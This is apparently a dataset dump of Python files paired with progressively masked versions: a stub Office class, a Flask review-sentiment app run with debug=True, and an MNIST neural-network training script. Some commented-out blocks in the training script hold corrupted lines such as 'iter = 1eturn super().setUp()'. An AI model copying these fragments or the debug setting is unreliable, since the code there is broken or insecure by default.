Columns:
- code: string (lengths 13 to 1.2M)
- order_type: string (1 distinct value)
- original_example: dict
- step_ids: list (lengths 1 to 5)
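Each row below pairs a source file (code, shown flattened by the viewer) with its order_type, an original_example dict holding progressively unmasked versions of that file (step-1 through step-5, some null), and the matching step_ids. A minimal sketch for iterating over such rows, assuming they have been exported as JSON Lines to a hypothetical examples.jsonl (the filename and the export format are assumptions, not something stated in this dump):

import json

# Hypothetical export of the rows shown below; this dump does not name a file.
with open("examples.jsonl", encoding="utf-8") as fh:
    for line in fh:
        record = json.loads(line)
        example = record["original_example"]
        # step-1 .. step-5 hold increasingly complete versions; some may be null/None.
        steps = [example.get("step-%d" % i) for i in range(1, 6)]
        present = [s for s in steps if s is not None]
        print(record["order_type"], record["step_ids"], len(present))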
from room import Room


class Office(Room):

    def __init__(self):
        pass
normal
{ "blob_id": "d3af5ac87474a99f1ade222995884bc8e035ce35", "index": 6142, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Office(Room):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n", "step-4": "from room import Room\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
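In the rows shown here, the highest-numbered non-null step-N string matches the row's code column up to whitespace and formatting, so the complete program can be recovered from the original_example dict alone. A small helper illustrating that reading of the fields (the mapping is an assumption inferred from the visible rows, not documented in this dump):

def last_complete_step(example):
    """Return the highest-numbered non-null step-N string, or None.

    Assumption from the visible rows: this string matches the row's
    `code` column up to whitespace/formatting differences.
    """
    for i in range(5, 0, -1):
        step = example.get("step-%d" % i)
        if step is not None:
            return step
    return None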
from flask import Flask, render_template , request
import joblib


# importing all the important libraires
import numpy as np
import pandas as pd
import nltk
import string
from nltk.corpus import stopwords
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
# download the model
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer

lemma = WordNetLemmatizer()

# initialse the app
app = Flask(__name__)

#load the model
tfidf = joblib.load('tfidf_vector_model.pkl')
model = joblib.load('netflix_75.pkl')

@app.route('/')
def hello():
    return render_template('form.html')

@app.route('/submit' , methods = ["POST"])
def form_data():
    user_data = request.form.get('user_data')
    user_data1 = [user_data]
    vector = tfidf.transform(user_data1)
    my_pred = model.predict(vector)

    if my_pred[0] == 1:
        out = 'positve review'
    else:
        out = 'negative review'

    return render_template('predict.html' , data = f' {out}')

if __name__ == '__main__':
    app.run(debug = True)
normal
{ "blob_id": "df92166378c8a8cc0ba02d0ba33d75bbd94510a7", "index": 4754, "step-1": "<mask token>\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\n<mask token>\n", "step-2": "<mask token>\nnltk.download('wordnet')\n<mask token>\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-3": "<mask token>\nnltk.download('wordnet')\n<mask token>\nlemma = WordNetLemmatizer()\napp = Flask(__name__)\ntfidf = joblib.load('tfidf_vector_model.pkl')\nmodel = joblib.load('netflix_75.pkl')\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from flask import Flask, render_template, request\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport string\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer\nlemma = WordNetLemmatizer()\napp = Flask(__name__)\ntfidf = joblib.load('tfidf_vector_model.pkl')\nmodel = joblib.load('netflix_75.pkl')\n\n\[email protected]('/')\ndef hello():\n return render_template('form.html')\n\n\[email protected]('/submit', methods=['POST'])\ndef form_data():\n user_data = request.form.get('user_data')\n user_data1 = [user_data]\n vector = tfidf.transform(user_data1)\n my_pred = model.predict(vector)\n if my_pred[0] == 1:\n out = 'positve review'\n else:\n out = 'negative review'\n return render_template('predict.html', data=f' {out}')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "from flask import Flask, render_template , request\r\nimport joblib\r\n\r\n\r\n# importing all the important libraires\r\nimport numpy as np\r\nimport pandas as pd\r\nimport nltk\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\n# download the model\r\nnltk.download('wordnet')\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\nlemma = WordNetLemmatizer()\r\n\r\n# initialse the app\r\napp = Flask(__name__)\r\n\r\n#load the model\r\ntfidf = joblib.load('tfidf_vector_model.pkl')\r\nmodel = joblib.load('netflix_75.pkl')\r\n\r\[email protected]('/')\r\ndef hello():\r\n return 
render_template('form.html')\r\n\r\[email protected]('/submit' , methods = [\"POST\"])\r\ndef form_data():\r\n user_data = request.form.get('user_data')\r\n user_data1 = [user_data]\r\n vector = tfidf.transform(user_data1)\r\n my_pred = model.predict(vector)\r\n\r\n if my_pred[0] == 1:\r\n out = 'positve review'\r\n else:\r\n out = 'negative review'\r\n \r\n \r\n\r\n \r\n\r\n return render_template('predict.html' , data = f' {out}')\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
from HiddenLayer import HiddenLayer
from Vector import Vector
import IO
import Loss
import Utils
import Activation
import Backpropagation
import Rate


# As a test, let's simulate the OR-gate with a single perceptron
""" training = []
training.append(Vector(2, arr=[1, 1]))
training.append(Vector(2, arr=[1, 0]))
training.append(Vector(2, arr=[0, 1]))
training.append(Vector(2, arr=[0, 0]))

labels = Vector(4, arr=[1, 1, 1, 0])
from Vector
left_true= Vector(2, arr=[1, 0])
both_false = Vector(2, arr=[0, 0])

print(tron.predict(both_true))
print(tron.predict(right_true))
print(tron.predict(left_true))
print(tron.predict(both_false)) """

# Testing the reading of data
""" images = Data.read_images('test')
labels = Data.read_labels('test')

UI.draw_image(images[1234], "testi")
print(labels[1234]) """

# Vector multiplication test
""" print(Vector(4, arr=[1, 2, 3, 4]) * Vector(4, arr=[1, 2, 2, 2])) """

# Neuron output test
""" n = Neuron(Utils.rand_array(4), Activation.sigmoid, Activation.sigmoid_d, 3)
x = Vector(4, arr=Utils.rand_array(4))
print(n)
print(x)
print(n.output(x)) """

# rand_array and normalization test
""" arr = Utils.rand_array(10, -5, 15)
print(arr)
print(Utils.normalize(arr, -5, 15)) """

# Testing some hidden layer basic functionality and saving/loading
""" images = IO.read_images('test')
labels = IO.read_labels('test')

weights = [Utils.rand_array(784, -1, 1) for _ in range(10)]
hl_a = HiddenLayer(10, 784, weights, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)

#IO.save_layer(hl_a, "test")
hl_b = IO.load_layer("test")

for i in range(9):
    img = Vector(Utils.normalize(Utils.flatten_2d(images[i]), 0, 255))
    o1 = hl_a.generate_output(img)
    o2 = hl_b.generate_output(img)
    #print("Picture " + str(i + 1) + ": " + str(o1) + ", " + str(o2) + ", correct answer is " + str(labels[i]))
    print(o1)
    print(o2) """

# Array flattening testing
""" testarr = [[1, 2, 7, 8], [3, 4, 9, 10], [5, 6, 11, 12]]
testarr = Utils.flatten_2d(testarr)
print(testarr)
testarr = Utils.deflatten_2d(testarr, 4, 3)
print(testarr) """

# Let's test multi-layer nets
""" images = IO.read_images('test')
labels = IO.read_labels('test')
img_test = images[:20]
lab_test = labels[:20]

weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]
weights_b = [Utils.rand_array(10, 0, 1) for _ in range(10)]
hl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)
hl_b = HiddenLayer(10, 10, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)

LEARNING_RATE = 0.5

for (i, l) in zip(images, labels):
    img = Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255))
    lab = Utils.onehot_label_arr(l)
    o_a = hl_a.generate_output(img)
    o_b = hl_b.generate_output(o_a)
    grads = Backpropagation.output_layer_grads(hl_b, o_b, lab, hl_a, LEARNING_RATE)
    #grad_b =
    #print("Picture " + str(i + 1) + ": " + str(o1) + ", " + str(o2) + ", correct answer is " + str(labels[i]))
    #print(o_a)
    #print(o_b)
    #print(lab)
    #print()
    #print("----")

for n in hl_b.neurons:
    print(n.weights) """

# Let's try how well a single one-layer 10-neuron net performs!
# Read images and labels
""" images = IO.read_images('training')
labels = IO.read_labels('training')
test_images = IO.read_images('test')
test_labels = IO.read_labels('test')
print("Images & labels read!")

# Preprocess images and labels
images_flat = []
labels_oh = []
test_images_flat = []

for (i, l) in zip(images, labels):
    images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))
    labels_oh.append(Utils.onehot_label_arr(l))

for i in test_images:
    test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))

print("Images & labels processed!")

# Initialize weights and layer
#weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]
weights_a = [[0] * 784] * 10
hl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)

LEARNING_RATE = 0.05

iter = 1eturn super().setUp()
prev_correct = 0
#old_weights = weights_a
while True:
    print("Iteration: " + str(iter))

    j = 1
    for (img, lab) in zip(images_flat, labels_oh):
        o_a = hl_a.generate_output(img)
        grads = Backpropagation.output_layer_backpropagate(hl_a, o_a, lab, img, LEARNING_RATE)

        if j % 1000 == 0:
            print(" " + str(j))
        j += 1

    right_amount = 0
    for (img, lab) in zip(test_images_flat, test_labels):
        o_a = hl_a.generate_output(img)
        pred = Utils.make_prediction(o_a)
        if pred == lab:
            right_amount += 1

    print("Correct predictions: " + str(right_amount))

    if (iter > 10):
        break

    prev_correct = right_amount
    iter = iter + 1 """

#IO.save_layer(hl_a, "test1_3")


# Visualize weights!
""" hl_a = IO.load_layer("test1_3")

i = 0
for n in hl_a.neurons:
    weights = n.weights
    weights = Utils.fit_arr(weights, 0, 255)
    #print(weights)
    IO.save_image(Utils.deflatten_2d(weights, 28, 28), "w" + str(i))
    i += 1 """


# Final boss: a 32-16-10 multi-layer net!
images = IO.read_images('training')
labels = IO.read_labels('training')
test_images = IO.read_images('test')
test_labels = IO.read_labels('test')
print("Images & labels read!")

# Preprocess images and labels
images_flat = []
labels_oh = []
test_images_flat = []

for (i, l) in zip(images, labels):
    images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))
    labels_oh.append(Utils.onehot_label_arr(l))

for i in test_images:
    test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))

print("Images & labels processed!")

# Don't change these two
IMAGE_INPUT_SIZE = 784
OUTPUT_LAYER_SIZE = 10

# These define how many neurons in layers A & B
LAYER_A_SIZE = 32
LAYER_B_SIZE = 16

# Initialize weights and layer
weights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(LAYER_A_SIZE)]
weights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)]
weights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(OUTPUT_LAYER_SIZE)]

hl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)
hl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)
opl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)

# ---- Change these if you want to play around with the program ----

# These decide when the training stops
ITERATION_CAP = 20 # after 20 iterations or
ACCURACY_CAP = 6500 # at 65% accuracy

# These adjust the learning process
INITIAL_LEARNING_RATE = 0.05
LEARNING_DECAY_SCALAR = 0.0025
BATCH_SIZE = 100

# ----------------

learning_rate = INITIAL_LEARNING_RATE
iter = 1
prev_correct = 0

while True:
    print("Iteration: " + str(iter))

    learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)

    print("Learning rate: " + str(learning_rate))

    j = 1
    batchtracker = 0
    img_sum = Vector([0] * IMAGE_INPUT_SIZE)
    lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)
    oa_sum = Vector([0] * LAYER_A_SIZE)
    ob_sum = Vector([0] * LAYER_B_SIZE)
    op_sum = Vector([0] * OUTPUT_LAYER_SIZE)

    for (img, lab) in zip(images_flat, labels_oh):
        o_a = hl_a.generate_output(img)
        o_b = hl_b.generate_output(o_a['op'])
        output = opl.generate_output(o_b['op'])

        img_sum = img_sum + img
        lab_sum = lab_sum + Vector(lab)
        oa_sum = oa_sum + o_a['op']
        ob_sum = ob_sum + o_b['op']
        op_sum = op_sum + output['op']

        batchtracker = batchtracker + 1

        if batchtracker == BATCH_SIZE:
            img_sum = img_sum * (1 / BATCH_SIZE)
            lab_sum = lab_sum * (1 / BATCH_SIZE)
            oa_sum = oa_sum * (1 / BATCH_SIZE)
            ob_sum = ob_sum * (1 / BATCH_SIZE)
            op_sum = op_sum * (1 / BATCH_SIZE)

            #print(opl.loss(lab_sum, op_sum))

            opl_backprop = Backpropagation.output_layer_backpropagate(opl, op_sum, lab, ob_sum, learning_rate)
            hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b, oa_sum, ob_sum, opl_backprop, learning_rate)
            hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a, img, oa_sum, hl_b_backprop, learning_rate)

            img_sum = Vector([0] * IMAGE_INPUT_SIZE)
            lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)
            oa_sum = Vector([0] * LAYER_A_SIZE)
            ob_sum = Vector([0] * LAYER_B_SIZE)
            op_sum = Vector([0] * OUTPUT_LAYER_SIZE)
            batchtracker = 0

        if j % 10000 == 0:
            print(" " + str(j))
        j += 1

    print("Iteration " + str(iter) + " done! Now testing accuracy...")

    right_amount = 0
    for (img_t, lab_t) in zip(test_images_flat, test_labels):
        oa = hl_a.generate_output(img_t)['op']
        ob = hl_b.generate_output(oa)['op']
        op = opl.generate_output(ob)['op']
        pred = Utils.make_prediction(op)
        if pred == lab_t:
            right_amount += 1

    print("Correct predictions: " + str(right_amount))

    if (iter >= ITERATION_CAP):
        break

    if (prev_correct >= ACCURACY_CAP):
        break

    #if (prev_correct > right_amount):
    #    break

    prev_correct = right_amount
    iter = iter + 1

IO.save_layer(hl_a, "test_layer_a")
IO.save_layer(hl_b, "test_layer_b")
IO.save_layer(opl, "test_layer_c")
normal
{ "blob_id": "1f86fe72c90c8457715a2f400dae8d355a9a97cf", "index": 8577, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('Images & labels read!')\n<mask token>\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\n<mask token>\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! 
Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-3": "<mask token>\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint('Images & labels read!')\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(\n LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)\n ]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(\n OUTPUT_LAYER_SIZE)]\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.\n sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\nITERATION_CAP = 20\nACCURACY_CAP = 6500\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] 
* LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-4": "from HiddenLayer import HiddenLayer\nfrom Vector import Vector\nimport IO\nimport Loss\nimport Utils\nimport Activation\nimport Backpropagation\nimport Rate\n<mask token>\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint('Images & labels read!')\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\nfor i, l in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\nprint('Images & labels processed!')\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(\n LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)\n ]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(\n OUTPUT_LAYER_SIZE)]\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.\n sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.\n mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.\n sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\nITERATION_CAP = 20\nACCURACY_CAP = 6500\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\nwhile True:\n print('Iteration: ' + str(iter))\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n print('Learning rate: ' + str(learning_rate))\n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n for img, lab in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n batchtracker = batchtracker + 1\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n opl_backprop = Backpropagation.output_layer_backpropagate(opl,\n 
op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b,\n oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a,\n img, oa_sum, hl_b_backprop, learning_rate)\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n if j % 10000 == 0:\n print(' ' + str(j))\n j += 1\n print('Iteration ' + str(iter) + ' done! Now testing accuracy...')\n right_amount = 0\n for img_t, lab_t in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n print('Correct predictions: ' + str(right_amount))\n if iter >= ITERATION_CAP:\n break\n if prev_correct >= ACCURACY_CAP:\n break\n prev_correct = right_amount\n iter = iter + 1\nIO.save_layer(hl_a, 'test_layer_a')\nIO.save_layer(hl_b, 'test_layer_b')\nIO.save_layer(opl, 'test_layer_c')\n", "step-5": "from HiddenLayer import HiddenLayer\nfrom Vector import Vector\nimport IO\nimport Loss\nimport Utils\nimport Activation\nimport Backpropagation\nimport Rate\n\n\n# As a test, let's simulate the OR-gate with a single perceptron\n\"\"\" training = []\ntraining.append(Vector(2, arr=[1, 1]))\ntraining.append(Vector(2, arr=[1, 0]))\ntraining.append(Vector(2, arr=[0, 1]))\ntraining.append(Vector(2, arr=[0, 0]))\n\nlabels = Vector(4, arr=[1, 1, 1, 0])\nfrom Vector \nleft_true= Vector(2, arr=[1, 0])\nboth_false = Vector(2, arr=[0, 0])\n\nprint(tron.predict(both_true))\nprint(tron.predict(right_true))\nprint(tron.predict(left_true))\nprint(tron.predict(both_false)) \"\"\"\n\n# Testing the reading of data\n\"\"\" images = Data.read_images('test')\nlabels = Data.read_labels('test')\n\nUI.draw_image(images[1234], \"testi\")\nprint(labels[1234]) \"\"\"\n\n# Vector multiplication test\n\"\"\" print(Vector(4, arr=[1, 2, 3, 4]) * Vector(4, arr=[1, 2, 2, 2])) \"\"\"\n\n# Neuron output test\n\"\"\" n = Neuron(Utils.rand_array(4), Activation.sigmoid, Activation.sigmoid_d, 3)\nx = Vector(4, arr=Utils.rand_array(4))\nprint(n)\nprint(x)\nprint(n.output(x)) \"\"\"\n\n# rand_array and normalization test\n\"\"\" arr = Utils.rand_array(10, -5, 15)\nprint(arr)\nprint(Utils.normalize(arr, -5, 15)) \"\"\"\n\n# Testing some hidden layer basic functionality and saving/loading\n\"\"\" images = IO.read_images('test')\nlabels = IO.read_labels('test')\n\nweights = [Utils.rand_array(784, -1, 1) for _ in range(10)]\nhl_a = HiddenLayer(10, 784, weights, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, 